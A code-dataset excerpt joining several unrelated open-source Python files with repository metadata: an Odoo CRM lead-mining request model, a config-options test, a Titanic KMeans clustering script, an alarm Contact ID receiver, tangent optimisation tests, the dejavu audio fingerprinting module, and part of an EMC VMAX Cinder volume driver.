lead_count = fields.Integer(compute='_compute_lead_count', string='Number of Generated Leads')
# Company Criteria Filter
filter_on_size = fields.Boolean(string='Filter on Size', default=False)
company_size_min = fields.Integer(string='Size', default=1)
company_size_max = fields.Integer(default=1000)
country_ids = fields.Many2many('res.country', string='Countries', default=_default_country_ids)
state_ids = fields.Many2many('res.country.state', string='States')
available_state_ids = fields.One2many('res.country.state', compute='_compute_available_state_ids',
help="List of available states based on selected countries")
industry_ids = fields.Many2many('crm.iap.lead.industry', string='Industries')
# Contact Generation Filter
contact_number = fields.Integer(string='Number of Contacts', default=10)
contact_filter_type = fields.Selection([('role', 'Role'), ('seniority', 'Seniority')], string='Filter on', default='role')
preferred_role_id = fields.Many2one('crm.iap.lead.role', string='Preferred Role')
role_ids = fields.Many2many('crm.iap.lead.role', string='Other Roles')
seniority_id = fields.Many2one('crm.iap.lead.seniority', string='Seniority')
# Fields for the blue tooltip
lead_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_contacts_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_total_credits = fields.Char(compute='_compute_tooltip', readonly=True)
@api.depends('lead_type', 'lead_number')
def _compute_display_lead_label(self):
selection_description_values = {
e[0]: e[1] for e in self._fields['lead_type']._description_selection(self.env)}
for request in self:
lead_type = selection_description_values[request.lead_type]
request.display_lead_label = '%s %s' % (request.lead_number, lead_type)
@api.onchange('lead_number', 'contact_number')
def _compute_tooltip(self):
for record in self:
company_credits = CREDIT_PER_COMPANY * record.lead_number
contact_credits = CREDIT_PER_CONTACT * record.contact_number
total_contact_credits = contact_credits * record.lead_number
record.lead_contacts_credits = _("Up to %d additional credits will be consumed to identify %d contacts per company.") % (contact_credits*company_credits, record.contact_number)
record.lead_credits = _('%d credits will be consumed to find %d companies.') % (company_credits, record.lead_number)
record.lead_total_credits = _("This makes a total of %d credits for this request.") % (total_contact_credits + company_credits)
@api.depends('lead_ids.lead_mining_request_id')
def _compute_lead_count(self):
if self.ids:
leads_data = self.env['crm.lead'].read_group(
[('lead_mining_request_id', 'in', self.ids)],
['lead_mining_request_id'], ['lead_mining_request_id'])
else:
leads_data = []
mapped_data = dict(
(m['lead_mining_request_id'][0], m['lead_mining_request_id_count'])
for m in leads_data)
for request in self:
request.lead_count = mapped_data.get(request.id, 0)
@api.depends('user_id', 'lead_type')
def _compute_team_id(self):
""" When changing the user, also set a team_id or restrict team id
to the ones user_id is member of. """
for mining in self:
# setting user as void should not trigger a new team computation
if not mining.user_id:
continue
user = mining.user_id
if mining.team_id and user in mining.team_id.member_ids | mining.team_id.user_id:
continue
team_domain = [('use_leads', '=', True)] if mining.lead_type == 'lead' else [('use_opportunities', '=', True)]
team = self.env['crm.team']._get_default_team_id(user_id=user.id, domain=team_domain)
mining.team_id = team.id
@api.depends('country_ids')
def _compute_available_state_ids(self):
""" States for some specific countries should not be offered as filtering options because
they drastically reduce the amount of IAP reveal results.
For example, in Belgium, only 11% of companies have a defined state within the
reveal service while the rest of them have no state defined at all.
Meaning specifying states for that country will yield a lot less results than what you could
expect, which is not the desired behavior.
Obviously all companies are active within a state, it's just a lack of data in the reveal
service side.
To help users create meaningful iap searches, we only keep the states filtering for several
whitelisted countries (based on their country code).
The complete list and reasons for this change can be found on task-2471703. """
for lead_mining_request in self:
countries = lead_mining_request.country_ids.filtered(lambda country:
country.code in iap_tools._STATES_FILTER_COUNTRIES_WHITELIST)
lead_mining_request.available_state_ids = self.env['res.country.state'].search([
('country_id', 'in', countries.ids)
])
@api.onchange('available_state_ids')
def _onchange_available_state_ids(self):
self.state_ids -= self.state_ids.filtered(
lambda state: (state._origin.id or state.id) not in self.available_state_ids.ids
)
@api.onchange('lead_number')
def _onchange_lead_number(self):
if self.lead_number <= 0:
self.lead_number = 1
elif self.lead_number > MAX_LEAD:
self.lead_number = MAX_LEAD
@api.onchange('contact_number')
def _onchange_contact_number(self):
if self.contact_number <= 0:
self.contact_number = 1
elif self.contact_number > MAX_CONTACT:
self.contact_number = MAX_CONTACT
@api.onchange('country_ids')
def _onchange_country_ids(self):
self.state_ids = []
@api.onchange('company_size_min')
def _onchange_company_size_min(self):
if self.company_size_min <= 0:
self.company_size_min = 1
elif self.company_size_min > self.company_size_max:
self.company_size_min = self.company_size_max
@api.onchange('company_size_max')
def _onchange_company_size_max(self):
if self.company_size_max < self.company_size_min:
self.company_size_max = self.company_size_min
def _prepare_iap_payload(self):
"""
This will prepare the data to send to the server
"""
self.ensure_one()
payload = {'lead_number': self.lead_number,
'search_type': self.search_type,
'countries': self.country_ids.mapped('code')}
if self.state_ids:
payload['states'] = self.state_ids.mapped('code')
if self.filter_on_size:
payload.update({'company_size_min': self.company_size_min,
'company_size_max': self.company_size_max})
if self.industry_ids:
# accumulate all reveal_ids (separated by ',') into one list
# eg: 3 records with values: "175,176", "177" and "190,191"
# will become ['175','176','177','190','191']
all_industry_ids = [
reveal_id.strip()
for reveal_ids in self.mapped('industry_ids.reveal_ids')
for reveal_id in reveal_ids.split(',')
]
payload['industry_ids'] = all_industry_ids
if self.search_type == 'people':
payload.update({'contact_number': self.contact_number,
'contact_filter_type': self.contact_filter_type})
if self.contact_filter_type == 'role':
payload.update({'preferred_role': self.preferred_role_id.reveal_id,
'other_roles': self.role_ids.mapped('reveal_id')})
elif self.contact_filter_type == 'seniority':
payload['seniority'] = self.seniority_id.reveal_id
return payload
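    # Editor's note: an illustrative payload added by the editor; the field
    # values below are hypothetical, shown for a 'people' search:
    #
    #     {'lead_number': 3,
    #      'search_type': 'people',
    #      'countries': ['BE'],
    #      'company_size_min': 1, 'company_size_max': 1000,
    #      'industry_ids': ['175', '176'],
    #      'contact_number': 10,
    #      'contact_filter_type': 'role',
    #      'preferred_role': '<reveal role id>',
    #      'other_roles': []}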
def _perform_request(self):
"""
This will perform the request and create the corresponding leads.
The user will be notified if he hasn't enough credits.
"""
self.error_type = False
server_payload = self._prepare_iap_payload()
reveal_account = self.env['iap.account'].get('reveal')
dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')
endpoint = self.env['ir.config_parameter'].sudo().get_param('reveal.endpoint', DEFAULT_ENDPOINT) + '/iap/clearbit/1/lead_mining_request'
params = {
'account_token': reveal_account.account_token,
'dbuuid': dbuuid,
'data': server_payload
}
try:
response = iap_tools.iap_jsonrpc(endpoint, params=params, timeout=300)
if not response.get('data'):
self.error_type = 'no_result'
return False
return response['data']
except iap_tools.InsufficientCreditError as e:
self.error_type = 'credits'
self.state = 'error'
return False
except Exception as e:
raise UserError(_("Your request could not be executed: %s", e))
def _create_leads_from_response(self, result):
""" This method will get the response from the service and create the leads accordingly """
self.ensure_one()
lead_vals_list = []
messages_to_post = {}
for data in result:
lead_vals_list.append(self._lead_vals_from_response(data))
template_values = data['company_data']
template_values.update({
'flavor_text': _("Opportunity created by Odoo Lead Generation"),
'people_data': data.get('people_data'),
})
messages_to_post[data['company_data']['clearbit_id']] = template_values
leads = self.env['crm.lead'].create(lead_vals_list)
for lead in leads:
if messages_to_post.get(lead.reveal_id):
lead.message_post_with_view('iap_mail.enrich_company', values=messages_to_post[lead.reveal_id], subtype_id=self.env.ref('mail.mt_note').id)
# Methods responsible for format response data into valid odoo lead data
@api.model
def _lead_vals_from_response(self, data):
self.ensure_one()
company_data = data.get('company_data')
people_data = data.get('people_data')
lead_vals = self.env['crm.iap.lead.helpers'].lead_vals_from_response(self.lead_type, self.team_id.id, self.tag_ids.ids, self.user_id.id, company_data, people_data)
lead_vals['lead_mining_request_id'] = self.id
return lead_vals
@api.model
def get_empty_list_help(self, help):
help_title = _('Create a Lead Mining Request')
sub_title = _('Generate new leads based on their country, industry, size, etc.')
return '<p class="o_view_nocontent_smiling_face">%s</p><p class="oe_view_nocontent_alias">%s</p>' % (help_title, sub_title)
def action_draft(self):
self.ensure_one()
self.name = _('New')
self.state = 'draft'
def action_submit(self):
self.ensure_one()
if self.name == _('New'):
self.name = self.env['ir.sequence'].next_by_code('crm.iap.lead.mining.request') or _('New')
results = self._perform_request()
if results:
self._create_leads_from_response(results)
self.state = 'done'
if self.lead_type == 'lead':
return self.action_get_lead_action()
elif self.lead_type == 'opportunity':
return self.action_get_opportunity_action()
elif self.env.context.get('is_modal'):
# when we are inside a modal already, we re-open the same record
# that way, the form view is updated and the correct error message appears
# (sadly, there is no way to simply 'reload' a form view within a modal)
return {
'name': _('Generate Leads'),
'res_model': 'crm.iap.lead.mining.request',
'views': [[False, 'form']],
'target': 'new',
'type': 'ir.actions.act_window',
'res_id': self.id,
'context': dict(self.env.context, edit=True, form_view_initial_mode='edit')
}
else:
# will reload the form view and show the error message on top
return False
def action_get_lead_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_all_leads")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'lead')]
return action
def action_get_opportunity_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_opportunities")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'opportunity')]
return action
def action_buy_credits(self):
return {
'type': 'ir.actions.act_url',
'url': self.env['iap.account'].get_credits_url(service_name='reveal'),
}
| gpl-3.0 | 4,967,390,844,346,431,000 | 45.580357 | 188 | 0.615104 | false |
bstrebel/PyUtils | test/test_options.py | 1 | 2293 | import os, sys, logging, logging.config, pyutils
from pyutils import Options, LogAdapter, get_logger, log_level
def main():
from ConfigParser import ConfigParser
from argparse import ArgumentParser
options = {
'option': 'OPTION',
'secrets': {'token': 'secret'},
'loglevel': 'INFO'
}
# region Command line arguments
parser = ArgumentParser(description='PySnc Engine Rev. 0.1 (c) Bernd Strebel')
parser.add_argument('-c', '--config', type=str, help='use alternate configuration file')
parser.add_argument('-l', '--loglevel', type=str,
choices=['DEBUG', 'INFO', 'WARN', 'WARNING', 'ERROR', 'CRITICAL',
'debug', 'info', 'warn', 'warning', 'error', 'critical'],
help='debug log level')
args = parser.parse_args()
opts = Options(options, args, config=True)
# _logger = get_logger('root',log_level(opts.loglevel))
# logger = LogAdapter(_logger, {'package': 'init'})
# logger.info("Console logger initilized")
# endregion
# region (I) Basic configuration and logger settings from config file
# if opts.config_file:
# if os.path.isfile(opts.config_file):
# logging.config.fileConfig(opts.config_file)
# config = ConfigParser(options)
# config.read(opts.config_file)
# else:
# logger.critical('Configuration file %s not found!' % (opts.config_file))
# exit(1)
# else:
# logger.critical("Missing configuration file!")
# exit(1)
#
# _logger = logging.getLogger()
# _logger.setLevel(log_level(opts.loglevel))
#
# logger = LogAdapter(_logger, {'package': 'main'})
# endregion
# region (II) Basic configuration and logger settings from config parser
config = opts.config_parser
logger = LogAdapter(opts.logger, {'package': 'main'})
# endregion
logger.info('Default logger configured from %s' % (opts.config_file))
print opts.option
s = opts.get('string_option', False)
t = opts['secrets']['token']
e = opts['empty']
b = opts.get('uni')
u = opts['uni']
pass
#f = Options.get_bool_value(opt)
# region __Main__
if __name__ == '__main__':
main()
exit(0)
# endregion
| gpl-2.0 | -958,336,599,769,721,000 | 26.626506 | 92 | 0.598779 | false |
Rocamadour7/ml_tutorial | 05. Clustering/titanic-data-example.py | 1 | 1721 | import numpy as np
from sklearn.cluster import KMeans
from sklearn import preprocessing
import pandas as pd
'''
Pclass Passenger Class (1 = 1st; 2 = 2nd; 3 = 3rd)
survival Survival (0 = No; 1 = Yes)
name Name
sex Sex
age Age
sibsp Number of Siblings/Spouses Aboard
parch Number of Parents/Children Aboard
ticket Ticket Number
fare Passenger Fare (British pound)
cabin Cabin
embarked Port of Embarkation (C = Cherbourg; Q = Queenstown; S = Southampton)
boat Lifeboat
body Body Identification Number
home.dest Home/Destination
'''
df = pd.read_excel('titanic.xls')
df.drop(['body', 'name'], 1, inplace=True)
df.fillna(0, inplace=True)
def handle_non_numerical_data(df):
columns = df.columns.values
for column in columns:
text_digit_vals = {}
def convert_to_int(val):
return text_digit_vals[val]
if df[column].dtype != np.int64 and df[column].dtype != np.float64:
column_contents = df[column].values.tolist()
unique_elements = set(column_contents)
x = 0
for unique in unique_elements:
if unique not in text_digit_vals:
text_digit_vals[unique] = x
x += 1
df[column] = list(map(convert_to_int, df[column]))
return df
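# Editor's note (added example): for a hypothetical column such as
# df['sex'] = ['male', 'female', 'male'], handle_non_numerical_data assigns
# each unique value an arbitrary but column-consistent integer, e.g.
# {'male': 0, 'female': 1}, turning the column into [0, 1, 0].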
df = handle_non_numerical_data(df)
X = np.array(df.drop(['survived'], 1).astype(float))
X = preprocessing.scale(X)
y = np.array(df['survived'])
clf = KMeans(n_clusters=2)
clf.fit(X)
correct = 0
for i in range(len(X)):
predict_me = np.array(X[i].astype(float))
predict_me = predict_me.reshape(-1, len(predict_me))
prediction = clf.predict(predict_me)
if prediction[0] == y[i]:
correct += 1
print(correct/len(X))
| mit | 7,085,823,906,355,869,000 | 26.31746 | 77 | 0.646717 | false |
scudre/alarm-central-station-receiver | alarm_central_station_receiver/contact_id/callup.py | 1 | 3225 | """
Copyright (2018) Chris Scuderi
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import re
from alarm_central_station_receiver.contact_id import handshake
def calc_checksum(code):
checksum = 0
for digit in code:
# 0 is treated as 10 in the checksum calculation
checksum += int(digit, 16) if digit != '0' else 10
return checksum % 15
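# Editor's note: an illustrative check added by the editor. For the
# hypothetical Contact ID message '1111181131010019' the digit sum, with
# '0' counted as 10, is 60, a multiple of 15, so calc_checksum() returns 0
# and the message passes validation.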
def parse_alarm_codes(code_str):
pattern = "([0-9]{4}18[136][0-9abcdef]{8}[0-9abcdef]?(?![0-9]{3}18[136]))"
codes = []
for code in re.split(pattern, code_str):
if not code:
continue
        # There seems to be some bugginess with either TigerJet or the alarm system
        # when sending the last checksum digit when it's above 'c'
if len(code) == 15:
# XXX hack - Tigerjet can't detect the highest DTMF code of 15
if calc_checksum(code) == 0:
code += 'f'
# XXX hack - Tigerjet can't detect the high DTMF code of 14
if calc_checksum(code) == 1:
code += 'e'
if calc_checksum(code) == 2:
code += 'd'
codes.append((code, calc_checksum(code) == 0))
return codes
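# Editor's note (added example, hypothetical data): for
# code_str = '1111181131010019' * 2 the pattern above should split the
# stream into two 16-digit messages, each paired with its checksum verdict:
# [('1111181131010019', True), ('1111181131010019', True)].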
def collect_alarm_codes(fd):
logging.info("Collecting Alarm Codes")
code_str = ''
# Play the alarm handshake to start getting the codes
with handshake.Handshake():
off_hook, digit = get_phone_status(fd)
while off_hook:
code_str += format(digit, 'x') if digit != -1 else ''
off_hook, digit = get_phone_status(fd)
logging.info("Alarm Hung Up")
logging.info('Code String: %s', code_str)
return code_str
def validate_alarm_call_in(fd, expected):
number = '000'
off_hook, digit = get_phone_status(fd)
if off_hook:
logging.info("Phone Off The Hook")
while off_hook:
if digit != -1:
logging.debug("Digit %d", digit)
number = number[1:] + format(digit, 'x')
logging.debug("Number %s", number)
if number == expected:
logging.info("Alarm Call In Received")
break
off_hook, digit = get_phone_status(fd)
logging.debug("Number %s", number)
if not off_hook:
logging.info("Phone On The Hook")
return number == expected and off_hook
def get_phone_status(fd):
status = bytearray(fd.read(2))
digit = status[0]
if digit < 11:
digit = digit - 1
off_hook = ((status[1] & 0x80) == 0x80)
return (off_hook, digit)
def handle_alarm_calling(fd, number):
codes = []
if validate_alarm_call_in(fd, number):
code_str = collect_alarm_codes(fd)
codes = parse_alarm_codes(code_str)
return codes
| apache-2.0 | 6,096,464,687,842,636,000 | 26.801724 | 83 | 0.613953 | false |
google/tangent | tests/test_optimization.py | 1 | 2734 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gast
import pytest
from tangent import optimization
from tangent import quoting
def test_assignment_propagation():
def f(x):
y = x
z = y
return z
node = quoting.parse_function(f)
node = optimization.assignment_propagation(node)
assert len(node.body[0].body) == 2
def test_dce():
def f(x):
y = 2 * x
return x
node = quoting.parse_function(f)
node = optimization.dead_code_elimination(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_fixed_point():
def f(x):
y = g(x)
z = h(y)
return x
node = quoting.parse_function(f)
node = optimization.optimize(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_constant_folding():
def f(x):
x = 1 * x
x = 0 * x
x = x * 1
x = x * 0
x = x * 2
x = 2 * x
x = 2 * 3
x = 1 + x
x = 0 + x
x = x + 1
x = x + 0
x = x + 2
x = 2 + x
x = 2 + 3
x = 1 - x
x = 0 - x
x = x - 1
x = x - 0
x = x - 2
x = 2 - x
x = 2 - 3
x = 1 / x
x = 0 / x
x = x / 1
x = x / 0
x = x / 2
x = 2 / x
x = 2 / 8
x = 1 ** x
x = 0 ** x
x = x ** 1
x = x ** 0
x = x ** 2
x = 2 ** x
x = 2 ** 3
def f_opt(x):
x = x
x = 0
x = x
x = 0
x = x * 2
x = 2 * x
x = 6
x = 1 + x
x = x
x = x + 1
x = x
x = x + 2
x = 2 + x
x = 5
x = 1 - x
x = -x
x = x - 1
x = x
x = x - 2
x = 2 - x
x = -1
x = 1 / x
x = 0 / x
x = x
x = x / 0
x = x / 2
x = 2 / x
x = 0.25
x = 1
x = 0
x = x
x = 1
x = x ** 2
x = 2 ** x
x = 8
node = quoting.parse_function(f)
node = optimization.constant_folding(node)
node_opt = quoting.parse_function(f_opt)
lines = quoting.to_source(node).strip().split('\n')[1:]
lines_opt = quoting.to_source(node_opt).strip().split('\n')[1:]
# In Python 2 integer division could be on, in which case...
if 1 / 2 == 0:
lines_opt[27] = ' x = 0'
assert lines == lines_opt
if __name__ == '__main__':
assert not pytest.main([__file__])
| apache-2.0 | 2,331,356,449,715,369,500 | 18.528571 | 79 | 0.517191 | false |
huytd/dejavu | dejavu/fingerprint.py | 1 | 6020 | import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import (generate_binary_structure,
iterate_structure, binary_erosion)
import hashlib
from operator import itemgetter
IDX_FREQ_I = 0
IDX_TIME_J = 1
######################################################################
# Sampling rate, related to the Nyquist conditions, which affects
# the range frequencies we can detect.
DEFAULT_FS = 44100
######################################################################
# Size of the FFT window, affects frequency granularity
DEFAULT_WINDOW_SIZE = 4096
######################################################################
# Ratio by which each sequential window overlaps the last and the
# next window. Higher overlap will allow a higher granularity of offset
# matching, but potentially more fingerprints.
DEFAULT_OVERLAP_RATIO = 0.5
######################################################################
# Degree to which a fingerprint can be paired with its neighbors --
# higher will cause more fingerprints, but potentially better accuracy.
DEFAULT_FAN_VALUE = 15
######################################################################
# Minimum amplitude in spectrogram in order to be considered a peak.
# This can be raised to reduce number of fingerprints, but can negatively
# affect accuracy.
DEFAULT_AMP_MIN = 10
######################################################################
# Number of cells around an amplitude peak in the spectrogram in order
# for Dejavu to consider it a spectral peak. Higher values mean less
# fingerprints and faster matching, but can potentially affect accuracy.
PEAK_NEIGHBORHOOD_SIZE = 20
######################################################################
# Thresholds on how close or far fingerprints can be in time in order
# to be paired as a fingerprint. If your max is too low, higher values of
# DEFAULT_FAN_VALUE may not perform as expected.
MIN_HASH_TIME_DELTA = 0
MAX_HASH_TIME_DELTA = 200
######################################################################
# If True, will sort peaks temporally for fingerprinting;
# not sorting will cut down number of fingerprints, but potentially
# affect performance.
PEAK_SORT = True
######################################################################
# Number of bits to throw away from the front of the SHA1 hash in the
# fingerprint calculation. The more you throw away, the less storage, but
# potentially higher collisions and misclassifications when identifying songs.
FINGERPRINT_REDUCTION = 20
def fingerprint(channel_samples, Fs=DEFAULT_FS,
wsize=DEFAULT_WINDOW_SIZE,
wratio=DEFAULT_OVERLAP_RATIO,
fan_value=DEFAULT_FAN_VALUE,
amp_min=DEFAULT_AMP_MIN):
"""
FFT the channel, log transform output, find local maxima, then return
locally sensitive hashes.
"""
# FFT the signal and extract frequency components
arr2D = mlab.specgram(
channel_samples,
NFFT=wsize,
Fs=Fs,
window=mlab.window_hanning,
noverlap=int(wsize * wratio))[0]
# apply log transform since specgram() returns linear array
arr2D = 10 * np.log10(arr2D)
arr2D[arr2D == -np.inf] = 0 # replace infs with zeros
# find local maxima
local_maxima = get_2D_peaks(arr2D, plot=False, amp_min=amp_min)
# return hashes
return generate_hashes(local_maxima, fan_value=fan_value)
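# Illustrative end-to-end usage (editorial sketch; `samples` is a hypothetical
# mono PCM array, e.g. one channel decoded from a WAV file):
#
#   hashes = list(fingerprint(samples, Fs=DEFAULT_FS))
#   # each entry is a (sha1_prefix, time_offset) pair, e.g. ('e05b341a9b77a51fd26', 32)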
def get_2D_peaks(arr2D, plot=False, amp_min=DEFAULT_AMP_MIN):
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.morphology.iterate_structure.html#scipy.ndimage.morphology.iterate_structure
struct = generate_binary_structure(2, 1)
neighborhood = iterate_structure(struct, PEAK_NEIGHBORHOOD_SIZE)
    # find local maxima using our filter shape
local_max = maximum_filter(arr2D, footprint=neighborhood) == arr2D
background = (arr2D == 0)
eroded_background = binary_erosion(background, structure=neighborhood,
border_value=1)
# Boolean mask of arr2D with True at peaks
    detected_peaks = local_max & ~eroded_background
# extract peaks
amps = arr2D[detected_peaks]
j, i = np.where(detected_peaks)
# filter peaks
amps = amps.flatten()
peaks = zip(i, j, amps)
peaks_filtered = [x for x in peaks if x[2] > amp_min] # freq, time, amp
# get indices for frequency and time
frequency_idx = [x[1] for x in peaks_filtered]
time_idx = [x[0] for x in peaks_filtered]
if plot:
# scatter of the peaks
fig, ax = plt.subplots()
ax.imshow(arr2D)
ax.scatter(time_idx, frequency_idx)
ax.set_xlabel('Time')
ax.set_ylabel('Frequency')
ax.set_title("Spectrogram")
plt.gca().invert_yaxis()
plt.show()
return zip(frequency_idx, time_idx)
def generate_hashes(peaks, fan_value=DEFAULT_FAN_VALUE):
"""
Hash list structure:
sha1_hash[0:20] time_offset
[(e05b341a9b77a51fd26, 32), ... ]
"""
fingerprinted = set() # to avoid rehashing same pairs
if PEAK_SORT:
peaks.sort(key=itemgetter(1))
for i in range(len(peaks)):
for j in range(1, fan_value):
if (i + j) < len(peaks) and not (i, i + j) in fingerprinted:
freq1 = peaks[i][IDX_FREQ_I]
freq2 = peaks[i + j][IDX_FREQ_I]
t1 = peaks[i][IDX_TIME_J]
t2 = peaks[i + j][IDX_TIME_J]
t_delta = t2 - t1
if t_delta >= MIN_HASH_TIME_DELTA and t_delta <= MAX_HASH_TIME_DELTA:
h = hashlib.sha1(
"%s|%s|%s" % (str(freq1), str(freq2), str(t_delta)))
yield (h.hexdigest()[0:FINGERPRINT_REDUCTION], t1)
# ensure we don't repeat hashing
fingerprinted.add((i, i + j))
| mit | -8,347,237,291,707,981,000 | 36.391304 | 148 | 0.589535 | false |
bswartz/cinder | cinder/volume/drivers/emc/emc_vmax_provision_v3.py | 1 | 35993 | # Copyright (c) 2012 - 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from oslo_concurrency import lockutils
from oslo_log import log as logging
import six
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder.volume.drivers.emc import emc_vmax_utils
LOG = logging.getLogger(__name__)
STORAGEGROUPTYPE = 4
POSTGROUPTYPE = 3
EMC_ROOT = 'root/emc'
THINPROVISIONINGCOMPOSITE = 32768
THINPROVISIONING = 5
INFO_SRC_V3 = 3
ACTIVATESNAPVX = 4
DEACTIVATESNAPVX = 19
SNAPSYNCTYPE = 7
class EMCVMAXProvisionV3(object):
"""Provisioning Class for SMI-S based EMC volume drivers.
This Provisioning class is for EMC volume drivers based on SMI-S.
It supports VMAX arrays.
"""
def __init__(self, prtcl):
self.protocol = prtcl
self.utils = emc_vmax_utils.EMCVMAXUtils(prtcl)
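    # Illustrative use (sketch; `conn`, `configService`, `sgName` and
    # `extraSpecs` are assumed to be supplied by the calling driver):
    #   provision = EMCVMAXProvisionV3('iSCSI')
    #   volumeDict, rc = provision.create_volume_from_sg(
    #       conn, configService, 'volume1', sgName, 1024, extraSpecs)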
def delete_volume_from_pool(
self, conn, storageConfigservice, volumeInstanceName, volumeName,
extraSpecs):
"""Given the volume instance remove it from the pool.
:param conn: connection to the ecom server
        :param storageConfigservice: the storage configuration service
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name (String)
:param extraSpecs: additional info
:returns: int -- return code
:raises: VolumeBackendAPIException
"""
startTime = time.time()
if isinstance(volumeInstanceName, list):
theElements = volumeInstanceName
volumeName = 'Bulk Delete'
else:
theElements = [volumeInstanceName]
rc, job = conn.InvokeMethod(
'ReturnElementsToStoragePool', storageConfigservice,
TheElements=theElements)
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Delete Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod ReturnElementsToStoragePool took: "
"%(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return rc
def create_volume_from_sg(
self, conn, storageConfigService, volumeName,
sgInstanceName, volumeSize, extraSpecs):
"""Create the volume and associate it with a storage group.
We use EMCCollections parameter to supply a Device Masking Group
to contain a newly created storage volume.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service
:param volumeName: the volume name (String)
:param sgInstanceName: the storage group instance name
associated with an SLO
:param volumeSize: volume size (String)
:param extraSpecs: additional info
:returns: dict -- volumeDict - the volume dict
:returns: int -- return code
:raises: VolumeBackendAPIException
"""
try:
storageGroupInstance = conn.GetInstance(sgInstanceName)
except Exception:
exceptionMessage = (_(
"Unable to get the name of the storage group"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
@lockutils.synchronized(storageGroupInstance['ElementName'],
"emc-sg-", True)
def do_create_volume_from_sg():
startTime = time.time()
rc, job = conn.InvokeMethod(
'CreateOrModifyElementFromStoragePool',
storageConfigService, ElementName=volumeName,
EMCCollections=[sgInstanceName],
ElementType=self.utils.get_num(THINPROVISIONING, '16'),
Size=self.utils.get_num(volumeSize, '64'))
LOG.debug("Create Volume: %(volumename)s. Return code: %(rc)lu.",
{'volumename': volumeName,
'rc': rc})
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Create Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod CreateOrModifyElementFromStoragePool "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
# Find the newly created volume.
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
return do_create_volume_from_sg()
def _find_new_storage_group(
self, conn, maskingGroupDict, storageGroupName):
"""After creating an new storage group find it and return it.
:param conn: connection to the ecom server
:param maskingGroupDict: the maskingGroupDict dict
:param storageGroupName: storage group name (String)
:returns: maskingGroupDict['MaskingGroup'] or None
"""
foundStorageGroupInstanceName = None
if 'MaskingGroup' in maskingGroupDict:
foundStorageGroupInstanceName = maskingGroupDict['MaskingGroup']
return foundStorageGroupInstanceName
def get_volume_dict_from_job(self, conn, jobInstance):
"""Given the jobInstance determine the volume Instance.
:param conn: the ecom connection
:param jobInstance: the instance of a job
:returns: dict -- volumeDict - an instance of a volume
"""
associators = conn.Associators(
jobInstance,
ResultClass='EMC_StorageVolume')
if len(associators) > 0:
return self.create_volume_dict(associators[0].path)
else:
exceptionMessage = (_(
"Unable to get storage volume from job."))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(data=exceptionMessage)
def get_volume_from_job(self, conn, jobInstance):
"""Given the jobInstance determine the volume Instance.
:param conn: the ecom connection
:param jobInstance: the instance of a job
:returns: dict -- volumeDict - an instance of a volume
"""
associators = conn.Associators(
jobInstance,
ResultClass='EMC_StorageVolume')
if len(associators) > 0:
return associators[0]
else:
exceptionMessage = (_(
"Unable to get storage volume from job."))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(data=exceptionMessage)
def create_volume_dict(self, volumeInstanceName):
"""Create volume dictionary
:param volumeInstanceName: the instance of a job
:returns: dict -- volumeDict - an instance of a volume
"""
volpath = volumeInstanceName
volumeDict = {}
volumeDict['classname'] = volpath.classname
keys = {}
keys['CreationClassName'] = volpath['CreationClassName']
keys['SystemName'] = volpath['SystemName']
keys['DeviceID'] = volpath['DeviceID']
keys['SystemCreationClassName'] = volpath['SystemCreationClassName']
volumeDict['keybindings'] = keys
return volumeDict
def create_element_replica(
